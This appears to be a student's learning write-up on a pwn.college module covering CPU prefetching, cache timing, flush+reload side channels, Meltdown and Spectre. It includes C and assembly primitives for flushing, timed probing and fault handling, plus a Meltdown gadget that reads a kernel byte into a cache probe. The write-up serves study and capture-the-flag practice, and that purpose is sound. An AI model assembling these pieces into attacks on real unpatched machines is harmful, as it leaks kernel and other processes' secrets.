TL;DR

This article encapsulates the key skills and insights I gained from the ‘Microarchitecture Exploitation’ module at pwn.college. As a novice in this field, my grasp of the intricate details might not be exhaustive, and there could be inadvertent inaccuracies in my exposition. I warmly welcome any corrections or insights you might have.

For those aspiring to deepen their understanding of these exploitation techniques, I highly recommend the professional guide available on pwn.college. It offers a more comprehensive and expert perspective on the subject.

0x00 What Is Microarchitecture Exploitation?

Microarchitecture is the way a given instruction set architecture (ISA) is implemented in a particular processor. –Wikipedia

The module is about exploiting the microarchitecture of x86 processors. It introduced several interesting processor features (prefetching and caching) and two famous microarchitectural attacks (Meltdown and Spectre).

0x01 Prefetch

To run faster, the CPU starts working on data and instructions before it is certain they are needed. In more detail, instructions are not executed strictly in order: each instruction is split into micro-instructions, and the execution order depends on the dependencies between those micro-instructions. For example, the following assembly code could be split into two independent chains of micro-instructions.

xor rcx, rcx    // Ins 0
xor rax, rax    // Ins 1
mov rax, [rax]  // Ins 2
mov rcx, [rdi]  // Ins 3

(This split is not precise; it is just to aid understanding.)

  • Part0: MicroIns from Ins0 and Ins3
  • Part1: MicroIns from Ins1 and Ins2

As we know, instruction 1 sets rax to 0, so instruction 2 crashes with a segmentation fault (it dereferences address 0). However, accessing memory and delivering the fault is slow, which means the micro-instructions in Part0 (in particular, instruction 3) can still be executed transiently! This fact is used in the following sections and in the Meltdown section to build a way to leak data from physical memory!

Also, we should notice that micro-instructions operate at a lower level than assembly: when the CPU notices that we crashed at instruction 2, the effects of instruction 3 are rolled back and never committed to the architectural registers.

0x02 Cache & Flush and Reload

My understanding of caches is quite naive: to make the CPU faster, data that is likely to be used again is kept in a smaller, faster storage area, which avoids the cost of reloading it from main memory. However, this can be abused in a side-channel attack to leak data.

The side channel attack is based on the simple fact that “If some memory data is loaded in the cache, the reload time is shorter”. So we have the simple demo called “flush and reload”:

(Pseudocode)

// A secret byte
secret_byte = "*"

// Allocate 0x100 pages of memory
mem = allocate_chunk(0x100*PAGE_SIZE)

// This function will clean the whole cache
flush_the_cache()

// Load a page to cache
fetch [mem+secret_byte*PAGE_SIZE]

// Reload
time_cost = [0] * 0x100
for x from 0 to 0x100:
    time_cost[x] = measure_fetch_time(mem[ x * PAGE_SIZE ])

// Check and "guess" the secret_byte: the fastest slot reveals it
leaked_byte = index_of_min(time_cost)

In the above pseudocode, we designed a way to leak a byte using a side channel: the memory access time. The key idea is that "if the data at an address is in the cache, reloading it is faster". So if our CPU's working environment is not too noisy, we can check the memory access speed and leak the secret byte.

Before heading to the next section, let's look at the instructions needed to implement the above pseudocode. We can split the whole attack into several primitives: load/reload, flush, measure, and check_result.

load/reload

There are several ways to load/reload the data from memory to cache. The simplest in c language is just to assign the data on the address to a variable:

char load(size_t address){
    // Interpret the integer address as a pointer
    char * pointer = (char *) address;
    // Reading through the pointer loads the value into a register and into the cache
    char c = * pointer;
    return c;
}

In assembly language, we can simply load the data from memory into a register, or use a dedicated prefetch instruction to bring it into the cache.

Method 1:

mov rax, $address
mov al, [rax]

Method 2:

mov rax, $address
prefetcht0 [rax]

flush

In C, the intrinsic _mm_clflush (from <x86intrin.h>) is a wrapper around the assembly instruction clflush, so the C version and the assembly version are quite similar.

C Language:

void flush(size_t address){
    _mm_clflush((void *) address);
}

Assembly Language:

mov rax, $address
clflush [rax]

Moreover, we have to make sure none of the probe bytes are in the cache, so we have to flush every probe slot. In the previous demo, we used the first byte of every page as a probe, so I wrote the flush function as follows:

void flush(size_t addr){
    for(int i = 0 ; i < 0x100 ; i++)
        _mm_clflush((void *)(addr + i * 0x1000));
}

measure

Measuring memory access time requires a way to read the current time. For a precise and reliable timestamp, we use the intrinsic __rdtsc to read the Time-Stamp Counter. This function is a wrapper around the assembly instruction rdtsc, which returns the current value of the counter.

void measure(size_t addr){
    for(int i = 0 ; i < 0x100 ; i++)
        timing[i] = domeasure((size_t *)(i*0x1000+addr));
}

However, because of prefetching, we should avoid the following pitfall: to speed up loops, the CPU prefetches the data for the next iteration, which means that while we are measuring the access time of i*0x1000+addr, the line at (i+1)*0x1000+addr may already have been loaded into the cache. This yields imprecise results (artificially small access times), so we need a way to avoid it. A useful trick is to scramble the access order so the hardware prefetcher does not recognize a sequential pattern.

void measure(size_t addr){
    for(int i = 0 ; i < 0x100 ; i++){
        int mess = (i * 167 + 13) % 0x100;
        timing[mess] = domeasure((size_t *)(mess * 0x1000 + addr));
    }
}

In domeasure, we should also be careful about out-of-order execution, since it may distort the result. To make sure the instructions around the timed load execute in order, we need to apply fences to our code:

size_t domeasure(size_t* addr){
    _mm_mfence();  // Finish all load/store operations
    size_t start = __rdtsc();
    volatile size_t probe = *addr;
    _mm_lfence();  // Make sure accessing is finished
    size_t end = __rdtsc();
    return end - start;
}

The first mfence gives us a "quiet" (not noisy) starting point before reloading, while the lfence makes sure the probed access has finished before we take the second timestamp.

Basically, we have three fence instructions to control the execution flow:

  • lfence: waits until all prior loads have completed
  • sfence: waits until all prior stores have completed
  • mfence: waits until all prior loads and stores have completed

With the functions measure and domeasure introduced above, we are able to obtain precise timing data.

Result Check

The result-check function inspects the timing results and returns the most likely byte. It can be implemented to return a value whose access time is below a threshold, or to return the item with the lowest access time. This function varies from case to case, since access times depend on the environment. Here is a simple version I implemented, which returns the index with the lowest access time and signals failure if even that is above a threshold:

size_t check(){
    size_t min_val = 0xFFFFFFFF;
    size_t res_idx = 0;
    for(int i=1 ; i < 0x100 ; i++){
        size_t val = timing[i];
        if(val<min_val){
            min_val = val;
            res_idx = i;
        }
    }
    if(min_val > 0xb0) // Threshold
        res_idx = 0x101; // 0x101 -> Fail.
    return res_idx;
}

Other Primitives

There are other primitives you may need to control the flow or reduce noise: pin_cpu, segfault_handler, and segfault_register.

pin_cpu: Make sure your process runs on a specific CPU core

// From ChatGPT (requires _GNU_SOURCE and <sched.h>)
void pin_cpu(int cpu_number) {
    cpu_set_t mask;

    // Clear the CPU mask and set the desired CPU
    CPU_ZERO(&mask);
    CPU_SET(cpu_number, &mask);

    // Attempt to set the CPU affinity for the current process
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1) {
        perror("sched_setaffinity failed");
    }
}

segfault_handler and segfault_register: Register a user-defined function to handle segmentation faults.

Template Code:

static jmp_buf jb;

static void segfault_handler(int signum){
    (void) signum;
    sigset_t sigs;
    sigemptyset(&sigs);
    sigaddset(&sigs,signum);
    sigprocmask(SIG_UNBLOCK,&sigs,NULL);
    longjmp(jb,1);
}
void segfault_register(){
    struct sigaction sa;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    sa.sa_handler = segfault_handler;  // Matches the void (*)(int) handler above
    if (sigaction(SIGSEGV, &sa, NULL) == -1){
        perror("sigaction");
        exit(1);
    }
}
// Use `setjmp(jb);` to set the point where segfault_handler jumps

0x03 Meltdown

An amazing side-channel attack. I highly recommend reading the paper and its GitHub repository.

Meltdown takes advantage of out-of-order (transient) execution combined with a race condition. If there is no isolation between user-space and kernel-space memory, i.e., without mitigations such as KPTI (Kernel Page-Table Isolation), we can "kind of" access kernel memory from user space. I say "kind of" because when the CPU notices that the address is in kernel space, it forbids the access and raises a fault. However, as we discussed, before the fault is delivered the transient micro-instructions keep running, so we can construct the following code to build a side channel and leak a byte from the kernel.

// $rsi -> Kernel Space Addr
// $rdi -> Allocated User Space (0x100 * 0x1000)
xor ecx, ecx
mov rax, 0x1337
mov rax, [rax]      // Crash here: 0x1337 is unmapped
// Transiently executed after the faulting load:
mov cl, [rsi]       // Read one kernel byte
shl rcx, 12         // Multiply by 0x1000 (the page size)
mov rdi, [rdi+rcx]  // Touch the matching probe page -> caches it

In the code above, at the assembly level the instructions after mov rax, [rax] are never architecturally executed. However, because of transient execution, they do run at the micro-instruction level, which means the CPU loads the line at RDI + BYTE PTR [RSI] * 0x1000 into the cache. Since $RDI points to user-space memory, we can later measure its access times to find the slot that is cached, and since $RSI can be any kernel-space address, we are able to leak any byte!

Since the pwn.college Microarchitecture Exploitation module has challenges (Lv11 and Lv12) you can use to practice Meltdown further, I won't share my implementation here.

0x04 Spectre

Spectre Paper

My understanding of Spectre is kind of naive and it could be wrong.

Spectre also follows the template we used for microarchitecture exploitation. The biggest difference is that it trains the branch predictor, misleading the processor into speculatively executing code.

It's usually divided into V1 and V2. V1 focuses on misleading the processor into speculatively executing a branch that cannot actually be taken. For example,

// Spectre V1
// Assume processes share memory MEM[0x100][0x1000]
char secret[0x10] = {0};
read(open("/secret", O_RDONLY), secret, 0x8);
int idx = 0;
scanf("%d", &idx);
if((double)idx/8.0 >= 1.0){      // Slow FP check delays branch resolution
    char probe = secret[idx];
    MEM[(size_t)probe][0] = 1;   // Bring the probe page into the cache
}

In the above code, we added an if-statement so the process can never architecturally load a real secret byte into the cache (a valid idx >= 8 only reads the zeroed tail of secret). However, if we supply enough valid idx values (>= 8), the branch predictor learns that the if-block is taken; when we then pass an idx < 8, the CPU speculatively executes the block and loads the secret-dependent probe line into the cache. Similarly, for V2, we fool the processor into speculatively jmp/call-ing code that can't be reached at the assembly level. You can also find the corresponding examples on pwn.college's Microarchitecture Exploitation module (Lv13 and Lv14).

0x05 Epilogue

I have not only worked on implementing Meltdown and Spectre exploits, but have also come to appreciate the beauty of exploitation.

For me, this was the most challenging module on pwn.college. Prior to this, my knowledge of microarchitecture exploitation was quite limited. However, dedicating over 80 hours to these challenges has significantly expanded my understanding.

I’m very grateful for the guidance and support provided by @zolutal, @kyle, and @robwaz!